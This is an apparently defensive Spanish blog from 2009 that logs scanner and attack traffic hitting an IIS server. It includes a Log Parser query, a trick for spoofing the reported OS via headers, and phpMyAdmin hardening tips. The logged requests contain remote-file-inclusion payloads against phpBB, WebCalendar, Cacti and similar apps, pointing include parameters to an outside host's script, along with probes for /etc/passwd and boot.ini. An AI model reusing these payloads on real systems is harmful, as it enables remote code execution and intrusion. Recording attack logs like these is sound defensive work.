Primero preguntar
June 1, 2009
¿Qué S.O. estoy estoy buscando?
http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/
Para engañar a estos buscadores de tesoros podemos añadir una variable HTTP Headers con la palabra unix (Custom HTTP headers), de esta forma se piensan que están atacando un sistema Unix y realmente es un entorno Microsoft.
User-agent “Morfeus Fucking Scanner”
May 31, 2009
Other bot scanner
Scanner RFI en Perl
May 26, 2009
Scanner detectado en los logs: http://site.mynet.com/senkofiles/perlrfiscanner.txt
- – [26/May/2009:09:22:15 +0200] “GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1″ 404 325
- – [26/May/2009:09:22:15 +0200] “GET /forum/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 328
- – [26/May/2009:09:22:16 +0200] “GET /impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 322
- – [26/May/2009:09:22:16 +0200] “GET /forums/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 329
- – [26/May/2009:09:22:16 +0200] “GET /webcalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 339
- – [26/May/2009:09:22:16 +0200] “GET /WebCalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 339
- – [26/May/2009:09:22:16 +0200] “GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
- – [26/May/2009:09:22:17 +0200] “GET /webcalendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 335
- – [26/May/2009:09:22:17 +0200] “GET /calendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
- – [26/May/2009:09:22:17 +0200] “GET /calendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 332
- – [26/May/2009:09:22:17 +0200] “GET /kalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
- – [26/May/2009:09:22:17 +0200] “GET /webcal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 334
- – [26/May/2009:09:22:17 +0200] “GET /cal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 331
- – [26/May/2009:09:22:18 +0200] “GET /appserv/main.php?appserv_root=http://xxx/appserv/t.txt? HTTP/1.1″ 404 319
- – [26/May/2009:09:22:18 +0200] “GET /includes/db_adodb.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 324
- – [26/May/2009:09:22:18 +0200] “GET /includes/session.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 323
- – [26/May/2009:09:22:18 +0200] “GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 329
- – [26/May/2009:09:22:18 +0200] “GET /modules/projects/gantt2.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
- – [26/May/2009:09:22:19 +0200] “GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 332
- – [26/May/2009:09:22:19 +0200] “GET /modules/admin/vw_usr_roles.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 333
- – [26/May/2009:09:22:19 +0200] “GET /modules/public/calendar.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
- – [26/May/2009:09:22:19 +0200] “GET /modules/public/date_format.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 333
- – [26/May/2009:09:22:19 +0200] “GET /yabbse/Sources/Packages.php?sourcedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
- – [26/May/2009:09:22:20 +0200] “GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 338
- – [26/May/2009:09:22:20 +0200] “GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1″ 404 348
Entradas de FHScan+Core+1.1
May 21, 2009
Busca estas vulnerabilidades:
2009-05-12 23:31:29 /FastHTTPAuthScanner200test/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:29 /admin/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:29 /wwwstats/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:30 /cache-stats/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:33 /stats/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:33 /web-console/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:33 /jmx-console/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:37 /manager/html – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:40 /webcacheadmin/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:44 /backup/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:44 /~root/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:44 /phpmyadmin/ – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:48 /etc/passwd – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:48 /boot.ini – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:51 /etc/passwd – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:51 /boot.ini – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:51 /portal/page/portal/TOPLEVELSITE/Welcome – 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:53 /security/security.php – 404 Mozilla/5.0+(FHScan+Core+1.1) -
Pmafind
May 19, 2009
Scanner para phpmyadmin.
FHScan+Core+1.1
May 14, 2009
Tarasco Security: Fast HTTP Vulnerability Scanner: http://www.tarasco.org/security/FHScan_Fast_HTTP_Vulnerability_Scanner/
Entrada en el log:
404 Mozilla/5.0+(FHScan+Core+1.1)
Nuevos cs-uri en los Logs
May 13, 2009
/w00tw00t.at.ISC.SANS.test0:) 1
/w10tw01t.at.ISC.SANS.DFind:( 1
Phpmyadmin
May 7, 2009
Entradas repetidas en los log:
/phpmyadmin/main.php
/phpMyAdmin/main.php
/myadmin/main.php
/phpmyadmin2/main.php
/PMA/main.php
/mysql/main.php
/db/main.php
Consulta:
select cs-uri-stem, count (*) as a from ‘\W3SVC1\W3SVC1\*.*’ group by cs-uri-stem order by a desc
No tengo horde
May 4, 2009
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde2/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde3/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde-3.0.9/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /Horde/README | - |
Instalaciones en phpMyAdmin
May 3, 2009
15:01:21 W3SVC1 0.0.0.0 GET /phpMyAdmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /main.php – 80 – 0.0.0.0 – 404 0 2
15:01:21 W3SVC1 0.0.0.0 GET /php/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /PMA/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /phpmyadmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /phpmyadmin2/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /db/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /mysql/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /myadmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /phpmyadmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /phpMyAdmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /myadmin/main.php – 80 – 0.0.0.0 – 404 0 3
Recomendaciones para posibles ataques en phpMyAdmin
- Actualizar phpMyAdmin
- Cambiar la ruta
- Autenticar directorio
